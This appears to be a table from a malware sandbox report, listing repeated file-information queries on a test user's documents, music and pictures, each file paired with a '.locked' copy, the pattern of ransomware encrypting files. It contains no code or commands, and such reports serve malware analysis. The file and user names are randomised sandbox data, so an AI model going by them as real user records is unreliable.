| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\pAQR6Uhb8oyXxz.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\pAQR6Uhb8oyXxz.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\qoDVdgfVEP8C1IZVruKR.bmp | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\qoDVdgfVEP8C1IZVruKR.bmp.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\qoDVdgfVEP8C1IZVruKR.bmp.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\qoDVdgfVEP8C1IZVruKR.bmp.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\tjvnS0CLvj8W45c1R.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\tjvnS0CLvj8W45c1R.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\tjvnS0CLvj8W45c1R.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\tjvnS0CLvj8W45c1R.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\u-lj86MkJ.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\u-lj86MkJ.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\u-lj86MkJ.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\u-lj86MkJ.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\WSBLdWYpk.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\WSBLdWYpk.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\WSBLdWYpk.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\WSBLdWYpk.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\ZirYt0Xt.jpg | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\ZirYt0Xt.jpg.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\ZirYt0Xt.jpg.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop\ZirYt0Xt.jpg.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\-MGF\yj0sH30hJk0LAYu.ppt | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\-MGF\yj0sH30hJk0LAYu.ppt.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\-MGF\yj0sH30hJk0LAYu.ppt.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\-MGF\yj0sH30hJk0LAYu.ppt.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\62huJB\tkzv55s072Owx0PobKt\1ZzY.doc | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\62huJB\tkzv55s072Owx0PobKt\1ZzY.doc.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\62huJB\tkzv55s072Owx0PobKt\1ZzY.doc.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\62huJB\tkzv55s072Owx0PobKt\1ZzY.doc.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\62huJB\tkzv55s072Owx0PobKt\HSrjj2x8m w.pdf | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\62huJB\tkzv55s072Owx0PobKt\HSrjj2x8m w.pdf.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\62huJB\tkzv55s072Owx0PobKt\HSrjj2x8m w.pdf.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\62huJB\tkzv55s072Owx0PobKt\HSrjj2x8m w.pdf.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\62huJB\OUCsQYE.xls | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\62huJB\OUCsQYE.xls.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\62huJB\OUCsQYE.xls.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\62huJB\OUCsQYE.xls.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\X2jUDm7UI3Bf1ICa73D\RCk4e.pdf | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\X2jUDm7UI3Bf1ICa73D\RCk4e.pdf.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\X2jUDm7UI3Bf1ICa73D\RCk4e.pdf.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\X2jUDm7UI3Bf1ICa73D\RCk4e.pdf.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\9LmLjA8pk0rGO1UCb\1FC6.ppt | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\9LmLjA8pk0rGO1UCb\1FC6.ppt.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\9LmLjA8pk0rGO1UCb\1FC6.ppt.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\9LmLjA8pk0rGO1UCb\1FC6.ppt.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\g dNFcb6FnjnR\ES3 _Gqz.xls | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\g dNFcb6FnjnR\ES3 _Gqz.xls.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\g dNFcb6FnjnR\ES3 _Gqz.xls.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\g dNFcb6FnjnR\ES3 _Gqz.xls.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\gRzb7oFLyBcvbSNv-LC\A3cC6ntwzf6rjOkD.pdf | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\gRzb7oFLyBcvbSNv-LC\A3cC6ntwzf6rjOkD.pdf.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\gRzb7oFLyBcvbSNv-LC\A3cC6ntwzf6rjOkD.pdf.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\gRzb7oFLyBcvbSNv-LC\A3cC6ntwzf6rjOkD.pdf.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\gRzb7oFLyBcvbSNv-LC\jB6WY0ijF-NQi-J.ppt | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\gRzb7oFLyBcvbSNv-LC\jB6WY0ijF-NQi-J.ppt.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\gRzb7oFLyBcvbSNv-LC\jB6WY0ijF-NQi-J.ppt.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\gRzb7oFLyBcvbSNv-LC\jB6WY0ijF-NQi-J.ppt.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\OTVx6 RT5zx2uB.doc | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\OTVx6 RT5zx2uB.doc.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\OTVx6 RT5zx2uB.doc.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\OTVx6 RT5zx2uB.doc.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\4B4ePZC2t6LAG3WB7.wav | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\4B4ePZC2t6LAG3WB7.wav.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97 | type = file_attributes |
|
11 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\4B4ePZC2t6LAG3WB7.wav.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\4B4ePZC2t6LAG3WB7.wav.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\A3TyfwL K9v.wav | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\A3TyfwL K9v.wav.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\A3TyfwL K9v.wav.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\A3TyfwL K9v.wav.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\aHsxHvVGrhKQ.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\aHsxHvVGrhKQ.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\aHsxHvVGrhKQ.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\aHsxHvVGrhKQ.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\F_mh2z6BtFT7Kos_6G.mp3 | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\F_mh2z6BtFT7Kos_6G.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\F_mh2z6BtFT7Kos_6G.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\F_mh2z6BtFT7Kos_6G.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\xeBdZg2QrMG--2HBSRnm.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\xeBdZg2QrMG--2HBSRnm.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\xeBdZg2QrMG--2HBSRnm.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\xeBdZg2QrMG--2HBSRnm.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\XTIpdzJyOmWc9OAT7Gp.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\XTIpdzJyOmWc9OAT7Gp.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\XTIpdzJyOmWc9OAT7Gp.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\XTIpdzJyOmWc9OAT7Gp.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\8mdzr6.wav | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\8mdzr6.wav | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\8mdzr6.wav.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW | type = file_attributes |
|
10 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\8mdzr6.wav.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\8mdzr6.wav.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\beePm3JTb4.mp3 | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\beePm3JTb4.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\beePm3JTb4.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\beePm3JTb4.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\beePm3JTb4.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\NDeIpAkMX1CfmQx5QtF.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\NDeIpAkMX1CfmQx5QtF.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\NDeIpAkMX1CfmQx5QtF.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\NDeIpAkMX1CfmQx5QtF.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\qmFOtY5GmgYlzu-S.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\qmFOtY5GmgYlzu-S.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\qmFOtY5GmgYlzu-S.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\qmFOtY5GmgYlzu-S.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\xNEvPCIqTV.wav | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\xNEvPCIqTV.wav.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\xNEvPCIqTV.wav.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\xNEvPCIqTV.wav.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\863xTgYliRZqB.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\863xTgYliRZqB.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\863xTgYliRZqB.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\863xTgYliRZqB.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\bqmJjjj-.wav | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\bqmJjjj-.wav.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\bqmJjjj-.wav.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\bqmJjjj-.wav.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\BYp-GiUUBUdzAuZkH3.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\BYp-GiUUBUdzAuZkH3.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\BYp-GiUUBUdzAuZkH3.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\BYp-GiUUBUdzAuZkH3.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\DEMSQUqRTksP.wav | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\DEMSQUqRTksP.wav.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\DEMSQUqRTksP.wav.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\DEMSQUqRTksP.wav.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\KU7C.mp3 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\KU7C.mp3.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\KU7C.mp3.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Music\KU7C.mp3.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\1HXSP\Fa3z5avrpn.bmp | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\1HXSP\Fa3z5avrpn.bmp | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\1HXSP\Fa3z5avrpn.bmp.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d | type = file_attributes |
|
39 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh | type = file_attributes |
|
33 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW | type = file_attributes |
|
21 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\1HXSP | type = file_attributes |
|
4 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\1HXSP\Fa3z5avrpn.bmp.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\1HXSP\Fa3z5avrpn.bmp.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\1HXSP\j4Ld8uBhqmuHP3KxL4h.jpg | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\1HXSP\j4Ld8uBhqmuHP3KxL4h.jpg.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\1HXSP\j4Ld8uBhqmuHP3KxL4h.jpg.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\1HXSP\j4Ld8uBhqmuHP3KxL4h.jpg.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\J-vG52-IRrqW\kffcM8HKE.jpg | type = file_attributes |
|
6 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\J-vG52-IRrqW\kffcM8HKE.jpg | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\J-vG52-IRrqW\kffcM8HKE.jpg.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\J-vG52-IRrqW | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\J-vG52-IRrqW\kffcM8HKE.jpg.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\J-vG52-IRrqW\kffcM8HKE.jpg.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\l8_IUnff\ckKwcItn1NQ8UaZHXZ.jpg | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\l8_IUnff\ckKwcItn1NQ8UaZHXZ.jpg.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\l8_IUnff | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\l8_IUnff\ckKwcItn1NQ8UaZHXZ.jpg.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\l8_IUnff\ckKwcItn1NQ8UaZHXZ.jpg.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\l8_IUnff\r0B_UofmUsfyzx3hO.gif | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\l8_IUnff\r0B_UofmUsfyzx3hO.gif.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\l8_IUnff\r0B_UofmUsfyzx3hO.gif.locked | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\l8_IUnff\r0B_UofmUsfyzx3hO.gif.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1\66JPt-oVzJiHw.bmp | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1\66JPt-oVzJiHw.bmp.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1\66JPt-oVzJiHw.bmp.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1\66JPt-oVzJiHw.bmp.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1\718D_oTTeLvrUKMe.gif | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1\718D_oTTeLvrUKMe.gif.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1\718D_oTTeLvrUKMe.gif.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1\718D_oTTeLvrUKMe.gif.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1\bXc_1_mUh tfUnHVBj5.png | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1\bXc_1_mUh tfUnHVBj5.png.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1\bXc_1_mUh tfUnHVBj5.png.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1\bXc_1_mUh tfUnHVBj5.png.locked | type = attributes,time,size,volserialno |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\7NUwE8d.gif | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\7NUwE8d.gif.locked | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\7NUwE8d.gif.locked | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\7NUwE8d.gif.locked | type = attributes,time,size,volserialno |
|
1 | |
